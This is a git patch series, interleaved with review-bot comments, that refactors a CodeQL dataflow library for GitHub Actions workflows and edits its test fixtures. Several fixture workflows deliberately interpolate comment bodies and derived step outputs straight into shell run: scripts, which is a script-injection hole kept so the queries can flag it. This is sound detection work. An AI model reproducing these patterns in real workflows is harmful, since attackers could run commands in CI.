ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') 
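Review bot: The "Update Comment with New URL" step still expands `${{ steps.trim-url.outputs.trimmed_url }}` inside the `run:` script, although every other expression in this hunk was moved to `env:`. That value derives from the comment body through the earlier steps, and nothing marks whether it is the one finding this fixture is meant to keep or an oversight. If it is intentional, add a comment such as `# expected alert: trimmed_url derives from github.event.comment.body`. Otherwise pass it as `TRIMMED_URL: ${{ steps.trim-url.outputs.trimmed_url }}` and use `$TRIMMED_URL` in the script. The step's `run:` block continues in the following hunk.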
@@ -51,5 +55,3 @@ jobs: -H "Accept: application/vnd.github.v3+json" \ "${COMMENT_URL}" \ -d "$PAYLOAD" - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml deleted file mode 100644 index 01d33249251..00000000000 --- a/ql/src/test/.github/workflows/image_link_generator_2.yml +++ /dev/null 
@@ -1,61 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: extract-url - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: curl - env: - INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} - run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - - - name: Trim URL after PNG - id: trim-url - env: - REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} - run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" - - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} - run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" 
diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml deleted file mode 100644 index 70aece4f7cf..00000000000 --- a/ql/src/test/.github/workflows/image_link_generator_3.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: source - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: sink - run: | - echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/.github/workflows/inter1.yml b/ql/src/test/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter1.yml rename to ql/src/test/.github/workflows/inter-job.yml diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/src/test/.github/workflows/simple1.yml index f61e763f188..94e8be89bdc 100644 --- a/ql/src/test/.github/workflows/simple1.yml +++ b/ql/src/test/.github/workflows/simple1.yml @@ -5,12 +5,15 @@ jobs: runs-on: ubuntu-latest steps: - - id: source + - id: summary uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - - id: sink + - id: flow run: | - echo "${{steps.source.outputs.value}}" + echo "${{steps.summary.outputs.value}}" + - id: no-flow + run: | + echo "${{steps.summary.outputs.foo}}" diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index f3d79b97bc2..b40f5eb6ac0 100644 
--- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -33,4 +33,10 @@ jobs: echo "$file was changed" done + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done diff --git a/ql/src/test/.github/workflows/test.yml b/ql/src/test/.github/workflows/test.yml index 554a09f2105..628b6e6f1bf 100644 --- a/ql/src/test/.github/workflows/test.yml +++ b/ql/src/test/.github/workflows/test.yml @@ -22,7 +22,9 @@ jobs: run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 - run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + env: + MSG: ${{steps.step1.outputs.MSG}} + run: echo "test=$MSG" >> "$GITHUB_OUTPUT" job2: runs-on: ubuntu-latest @@ -32,5 +34,4 @@ jobs: needs: job1 steps: - - env: - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs.job_output}} From ebaac5f5cb16ec9aba60e2fdc75bba13b08811ab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:03:11 +0100 Subject: [PATCH 0030/1267] fix: enforce input,output,env prefixes in MaD --- .../codeql/actions/dataflow/ExternalFlow.qll | 26 +++++++++++-------- ql/lib/ext/PLACEHOLDER.model.yml | 7 +++++ .../frabert_replace-string-action.model.yml | 4 +-- ..._actions-find-and-replace-string.model.yml | 4 +-- 4 files changed, 26 insertions(+), 15 deletions(-) create mode 100644 ql/lib/ext/PLACEHOLDER.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 38b964110c7..6446fbb5572 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -50,22 +50,22 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") - then - // 'output.' is the default qualifier - source.asExpr() = uses + then source.asExpr() = uses else none() ) and sourceType = kind ) } -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate externallyDefinedStoreStep( + DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +) { exists(UsesExpr uses, string action, string version, string input, string output | - c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and summaryModel(action, version, input, output, "taint") and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -74,10 +74,11 @@ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, Dat ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + if input.trim().matches("input.%") + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and succ.asExpr() = uses ) 
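Review bot: A model row whose field has neither prefix now reaches `else none()` and silently yields no source; the same fall-through is added for summaries in the next hunk and for sinks in `externallyDefinedSink`, so a typo in a `.model.yml` file becomes a missed finding with no diagnostic. I would state the contract on each predicate, e.g. `/** The field must start with "env." or "output."; rows without a prefix are ignored. */`, and consider a small consistency query that lists such rows. Separately, `replaceAll("env.", "")` removes every occurrence of the substring rather than only the leading prefix; `fieldName.trim().suffix(4)` after the `matches("env.%")` test would strip just the prefix. The body of `externallyDefinedSource` starts above this hunk.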
@@ -87,8 +88,11 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) - else sink.asExpr() = uses.getArgumentExpr(input.trim()) + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + else + if input.trim().matches("input.%") + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + else none() ) and sinkModel(action, version, input, kind) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml new file mode 100644 index 00000000000..ef916067967 --- /dev/null +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - ["","","",""] + diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e..79fd5c76e4a 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 46a577d2f7e..332527813a4 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] From 494fb2470e1c399699b4dab1176ac573f9947ac2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:05:13 +0100 Subject: [PATCH 0031/1267] fix: refactor local, read and store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 74 ++++++------------- 2 files changed, 22 insertions(+), 54 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9def461900e..faa7c4c3ebe 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -40,7 +40,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { +predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(RunExpr r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 55fda038789..045910ed676 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
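Review bot: In FlowSteps.qll the renamed `runEnvToScriptStoreStep` keeps `output.replaceAll("output\\.", "")`, the escaped-dot form that the previous commit replaced with a plain `"output."` in ExternalFlow.qll. If `replaceAll` is a literal replacement, as that fix implies, this call never matches and the field name is stored unchanged. Whether `output` can carry the prefix depends on the rest of the predicate, which lies outside the hunk. If it cannot, `ct.getName() = output` says so directly; otherwise use `output.replaceAll("output.", "")` to match the other predicates.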
@@ -133,9 +133,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() } /** @@ -188,11 +188,12 @@ class ArgumentPosition extends string { predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } /** - * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself - * But only for those cases where the step output is defined externally in a MaD specification. - * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access - * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. - * e.g. ${{ steps.step1.output.foo }} + * Holds if there is a local flow step between a ${{ steps.xxx.outputs.yyy }} expression accesing a step output field + * and the step output itself. But only for those cases where the step output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(StepStmt astFrom, StepsCtxAccessExpr astTo | 
@@ -204,19 +205,6 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } -/** - * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} - */ -predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, CtxAccessExpr astTo | - astFrom = nodeFrom.asExpr() and - astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom and - (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) - ) -} - /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -252,7 +240,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or - jobsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } @@ -272,17 +259,12 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } -/** - * A read step to read the value of a ReusableWork uses step and connect it to its - * corresponding JobOutputAccessExpr - */ -predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { - exists(NeedsCtxAccessExpr expr, string fieldName | - expr.usesReusableWorkflow() and - expr.getRefExpr() = node1.asExpr() and - expr.getFieldName() = fieldName and - expr = node2.asExpr() and - c = any(FieldContent ct | ct.getName() = fieldName) +predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { + exists(CtxAccessExpr access | + (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access ) } 
@@ -291,24 +273,14 @@ predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { - // TODO: Extract to its own predicate - exists(StepsCtxAccessExpr access | - c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and - node2.asExpr() = access - ) - or - reusableWorkflowReturnReadStep(node1, node2, c) -} +predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * A store step to store an output expression (node1) into its OutputsStm node (node2) * with a given access path (fieldName) */ -predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { - exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | - out = stmt.getOutputsStmt() and +predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { + exists(OutputsStmt out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) @@ -321,13 +293,9 @@ predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) * contains the value of `node1`. */ predicate storeStep(Node node1, ContentSet c, Node node2) { - reusableWorkflowReturnStoreStep(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - externallyDefinedSummary(node1, node2, c) - or - // TODO: rename to xxxxStoreStep - runEnvToScriptstep(node1, node2, c) + fieldStoreStep(node1, node2, c) or + externallyDefinedStoreStep(node1, node2, c) or + runEnvToScriptStoreStep(node1, node2, c) } /** From 90d1ae4a05208f1b6a7c1b16f860e72b232288c3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 14:06:28 +0100 Subject: [PATCH 0032/1267] fix: simplify Ast --- ql/lib/codeql/actions/Ast.qll | 30 +++---------------- .../actions/controlflow/internal/Cfg.qll | 6 +--- 2 files changed, 5 insertions(+), 31 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 087b7f19e62..e5f9e35a4a9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -149,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + OutputsStmt getOutputsStmt() { result = this.(Actions::Job).lookup("outputs") } /** * Reusable workflow jobs may have Uses children @@ -166,28 +166,6 @@ class JobStmt extends Statement instanceof Actions::Job { } } -/** - * Declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ -class JobOutputStmt extends Statement instanceof YamlMapping { - JobStmt job; - - JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - - YamlMapping asYamlMapping() { result = this } - - /** - * Gets a specific value expression - * eg: ${steps.foo.bar} - */ - Expression getOutputExpr(string id) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) - } -} - /** * A Step is a single task that can be executed as part of a job. */ @@ -435,9 +413,9 @@ class NeedsCtxAccessExpr extends CtxAccessExpr { job.getLocation().getFile() = this.getLocation().getFile() and ( // regular jobs - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result or - // jobs calling reusable workflows + // reusable workflow calling jobs job.getUsesExpr() = result ) } 
@@ -464,7 +442,7 @@ class JobsCtxAccessExpr extends CtxAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(fieldName) = result + job.getOutputsStmt() = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8d044c827a2..8808fb0afe5 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -231,7 +231,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { rank[i](Expression child, Location l | ( child = super.getAStepStmt() or - child = super.getOutputStmt() or + child = super.getOutputsStmt() or child = super.getUsesExpr() ) and l = child.getLocation() @@ -243,10 +243,6 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { - override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } -} - private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { override ControlFlowTree getChildNode(int i) { result = From f65587e5cfa8b9d00dcb91d98df4a720bcc384a1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 17:08:13 +0100 Subject: [PATCH 0033/1267] feat(fieldflow): Refactor flow through Job outputs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Job output should flow to the “key†(YamlString) and be read from there from the JobOutputAccessExpr. - NeedsCtxAccessExpr.getRefExpr should point to the UsesExpr(RW calling Job) or to the OutputsStmt(Regular Job). - JobsCtxAccessExpr.getRefExpr should point to the OutputsStmt(Regular Job). - Create storeStep from OutputExpr to OutputStmt using output var name as the field name. - Create a readStep for CtxAccessExpr to read the referenced fields from the job outputs. --- .../dataflow/internal/DataFlowPrivate.qll | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 045910ed676..12be2d89998 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,9 +133,10 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as jobs, env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() } /** 
@@ -196,9 +197,8 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and - astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -259,9 +259,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { exists(CtxAccessExpr access | - (access instanceof NeedsCtxAccessExpr or access instanceof StepsCtxAccessExpr) and + ( + access instanceof NeedsCtxAccessExpr or + access instanceof StepsCtxAccessExpr or + access instanceof JobsCtxAccessExpr + ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and node1.asExpr() = access.getRefExpr() and node2.asExpr() = access 
@@ -272,12 +279,13 @@ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node1, node2, c) } /** - * A store step to store an output expression (node1) into its OutputsStm node (node2) - * with a given access path (fieldName) + * Stores an output expression (node1) into its OutputsStm node (node2) + * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(OutputsStmt out, string fieldName | @@ -291,6 +299,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. + * Store steps without corresponding reads are pruned aggressively very early, since they can never contribute to a complete path. */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or From 3c12e43d3fa1c5ae4fc878aab68540b15172b69b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 18:09:12 +0100 Subject: [PATCH 0034/1267] feat(composite-actions): Fix summary and source queries for composite actions analysis --- .../dataflow/internal/DataFlowPrivate.qll | 25 ------------------- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++++++++++++ .../CWE-020/CompositeActionSummaries.ql | 2 -- .../CWE-020/CompositeActionsSources.ql | 8 +++++- 4 files changed, 32 insertions(+), 28 deletions(-) 
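Review bot: The reworded comment on `fieldStoreStep` still names the class `OutputsStm`, while the body quantifies over `OutputsStmt`; it should read `Stores an output expression (node1) into its OutputsStmt node (node2)`. The sentence added to the `readStep` doc talks about store steps and is repeated verbatim on `storeStep` in the `@@ -291,6 +299,7 @@` hunk; on `readStep` it would be clearer from the reader's side, e.g. `Every store step needs a matching read step for the same content, otherwise it is pruned early and contributes no path.` The body of `fieldStoreStep` continues outside the hunk.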
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 12be2d89998..89f31983189 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -139,31 +139,6 @@ newtype TContent = name = any(JobsCtxAccessExpr a).getFieldName() } -/** - * A reference contained in an object. Examples include instance fields, the - * contents of a collection object, the contents of an array or pointer. - */ -class Content extends TContent { - /** Gets the type of the contained data for the purpose of type pruning. */ - DataFlowType getType() { any() } - - /** Gets a textual representation of this element. */ - abstract string toString(); - - /** - * Holds if this element is at the specified location. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `filepath`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 - } -} - predicate forceHighPrecision(Content c) { c instanceof FieldContent } class ContentApprox = ContentSet; diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 52101c7e5a7..8b62cccf30a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -130,6 +130,31 @@ class ContentSet instanceof Content { } } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ +class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + + /** Gets a textual representation of this element. */ + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} + /** A field of an object, for example an instance variable. */ class FieldContent extends Content, TFieldContent { private string name; diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 00a70eeed2f..875492644b8 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -17,12 +17,10 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - sink instanceof DataFlow::ReturnNode and exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) } } 
